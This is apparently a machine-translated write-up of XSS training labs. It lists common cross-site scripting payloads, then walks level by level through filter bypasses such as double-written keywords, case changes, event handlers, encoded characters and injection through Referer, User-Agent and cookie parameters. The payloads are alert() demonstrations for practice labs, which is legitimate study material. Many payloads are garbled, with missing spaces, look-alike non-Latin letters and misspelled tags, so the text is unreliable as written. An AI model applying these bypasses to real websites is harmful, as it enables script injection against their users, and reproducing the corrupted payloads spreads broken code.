Shooting range cloud show used
Commonly used payloads
The scirpt tag is used to define client scripts, such as JavaScirpt
alert(1)
alert(“xxs”)
The img tag defines an image in an HTML page
<imgsrc=1οnerrοr=alert(1)>
<imagsrc=1ongerror=alert(“xss”)>
The input tag specifies the input field where the user can enter data
<inputοnfοcus=alert(1)autofocus>
<inputοnblur=alert(1)autofocus>
<inputοnfοcus="alert(1)"autofocus>
The details tag specifies supplementary details of user-visible or hidden requirements by providing interactive controls for the user to turn on and off. The ontoggle event specifies that it fires when the user opens or closes an element:
<detailsοntοggle=alert(1);>
<detailsopenοntοggle=alert(1);>
The svg tag is used to directly embed the code of the SVG file in the HTML page
<svgοnlοad=alert(1);>
and other
commonly used payload.docx
first round
Enter the payload at the URL:
second level
Enter qyx in the search bar
to view the source code. 
The input content will be displayed in value. For example, if we enter the string of yunyansec, we can see yunyansec in the value value in the input tag. 
Bypass the train of thought, just close the tag with
'> or '>
third pass
When we enter dangerous characters that contain alert, they will be cleared.
Just bypass the idea
and double-write the alert function.
">aalertlert(1) or">
fourth level
When we enter dangerous characters containing alert, it will directly exit the script execution.
Bypassing the idea,
we can use other pop-up functions for testing, such as the prompt() function, which can display a dialog box prompting the user for input.
"> or">
fifth level
After testing this level, some dangerous characters will be deleted, such as: script, alert, on, img, etc.
Bypassing the idea
, just double write the dangerous characters.
">aalertlert(1) or">
Sixth hurdle
After testing, this level will delete more dangerous characters, such as: script, alert, on, img, <, src and more characters will be cleared.
2) Bypassing the idea
and using events, the onclick event will occur when the element is clicked;
combined with the sequence of program execution, that is, the sequence of deleting dangerous characters, double-write.
aaa" oimgnclick="alimgert(1)
xss game
The first level (JS pop-up window function alert())
Carefully observe the three arrows, and you can find that it submitted a name parameter to the server with a value of "test". From the page echo, the value of the name parameter is displayed on the page, and the characters of the name parameter value are displayed length. Next, check the source code: 
you can find that the value test of the get parameter name is inserted into the html, and the length of the payload is echoed
directly to the payload, inserting a piece of js code, and the get parameter
<script>alert('xss')</script>
**Of course, you can also pass other things to pass the first level. It is recommended to refer to the common trigger tags of XSS**
The second pass (closed bypass)
View the source code of the website
** The first test can be directly inserted into js as last time, let's try it first
<script>alert('xss')</script>
If it is not successful, check the source code of the website. 
The first test escapes the html entity, but the second one does not. We only need to close the double quotes to construct the payload
"> <script>alert()</script> <"
The third pass (onfocus can bypass html materialization (that is, the filtering of <>))
Enter first to view the source code of the website 
Compared to the previous level, here is a single quotation mark closed, try it
'> <script>alert()</script> <'
Unexpectedly, the symbols are all materialized. Suppose we construct an event here. When the event occurs, JavaScript can be executed. For example, when the user clicks on an HTML element, a function will be called from the event handler to construct a payload. Here Use onlcik, payload
' onclick=alert() '
fourth level
Enter first , check the source code of the website 
and find that only >< is filtered out, we continue to use events to pass
" onclick=alert() "
The fifth pass (use the insert tag to achieve js execution)
Enter first , check the source code of the website 
and find that the script tag is separated by _, use the trigger event again, and find that onclick is also 
filtered
.
<script>alert(1)</script>
<img src=ganyu οnerrοr=alert(1)>
<svg οnlοad=alert(1)>
<a herf=javascript:alert(1)>
It is found that javascript is not filtered, it is feasible to 
directly input it is a failure, and the previous content is not closed
" > <a href=javascript:alert('xss')>test</a> #弹窗需要点击test触发
The sixth pass (capitalization bypasses the str_replace() function)
Input first , check the source code 
content of the website and filter it, we try to use onclick, javascript, onerror, onload 
only javascript is not filtered, we try to use the method of closing
" > <a href=javascript:alert('xss')>test , failed Check the source code of the website 
and find that the href is filtered, you can try double writing, or upper and lower case, or encoding bypass
" > <a HreF=javascript:alert('xss')>test</a>
The seventh pass (double spelling bypasses the delete function)
Enter first , check the source code of the website 
and find that the script has been deleted, we try to double write, or upper and lower case, or code bypass, and found that double writing can
<scrscriptipt>alert()</scrscriptipt>
" ><scrscriptipt>alert()</scrscriptipt>
The eighth level (href attribute automatically parses Unicode encoding)
Input first , view the source code of the website 
When we input content, the content of value will be directly brought into href, and when the friendship link is triggered, the parameters brought in will be executed
Let's take a look and filter out those keywords onclick, javascript, onerror , onload, script, href, data 
try to double write, or case, or code bypass, found that the code can
javascript:alert()
Ninth level (insert specified content to bypass inspection)
First, replace the input with javascript:alert, because the script is filtered and we will materialize it. As mentioned earlier, it is a detection of http://. Here, try to comment out
javascript:alert() //http://
tenth pass
There is no input point except url, try to write the script
directly in the url to echo directly, and view the code to directly materialize the content we input as HTML.
We have seen a table, but the page does not display the content of this table, and the table The input function is used and hidden, used to accept standard input data, and the following type="hidden" is used to hide the field 
value is empty, we try to input in value
t_link=ganyu&t_history=ganyu&t_sort=ganyu
It is found that there is a line that echoes 
the construction payload, and then clicks
?t_sort=" onfocus=javascript:alert() type="jack
Eleventh level
Right-click to view the source code and find that there is a similar place to the previous question. 
We continue to do the same as the previous question, but this time we pass 4 parameters in the past.
t_link=jack&t_history=jack&t_sort=jack&t_ref=jack
As you can see, the value of t_sort here has display parameters, and there is also a special referer here. Those who are familiar with SQL injection should be familiar with this referer injection. We try to use the referer to pass parameters, open HackBar, click the referer to successfully echo the value to construct 
the 
payload
?t_ref=" onfocus=javascript:alert() type="jack
Twelfth pass
Right-click to view the source code, and found that there is a place similar to the previous question. 
There is a UA injection similar to SQL injection.
Open HackBar and click ua
construct payload
?t_ua=" onfocus=javascript:alert() type="jack
Thirteenth pass
Right-click to view the source code, and found that there is a similar place to the previous question, 
prompting us
to open HackBar with cook F12, and click cook
to construct the payload
?t_cook=" onfocus=javascript:alert() type="jack
No success! ! ! Let's take a look at the cookie of this webpage first. F12 opens 
the cookie named user. Now that we know the hidden user, we try to continue to use HackBar
to construct the payload .
user=?t_cook=" onfocus=javascript:alert() type="jack
Fourteenth level
unable to test
Fifteenth level
Check the source code of the website 
and find an ng-include. The function of include is to include the html file of the same server and pass parameters with src. When requesting src resources, the resources pointed to will be downloaded and applied to the document, such as JavaScript scripts. img pictures, etc., here we point src to any level, and input the corresponding xss popup script.
?src='/level1.php?name=<img src=1 onmouseover=alert()>'
Sixteenth off
After checking the website source code
keyword, the input content is echoed. Check the source code and find that it is wrapped by center, which is used to center the text and 
test to filter out those keywords.
?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> j
The comparison found that the letters are lowercased here first, then the script is replaced with spaces, and finally the spaces are materialized. I want to try the p tag <p οnmοusedοwn=alert()>abc
The space can be replaced by a carriage return. The url encoding of the carriage return is %0a, and with the use of /,,
?keyword=<img%0asrc=""%0aonerror=alert(1)>
Seventeenth hurdle
Check the source code and find that there is an embed tag, which is used to embed content. For example, the plug-in 
tries to modify the value 
to construct a payload [provided that you have a flash plug-in]
?arg01=a&arg02 onfocus=alert(1)
tools used
Firefox browser
cloud training range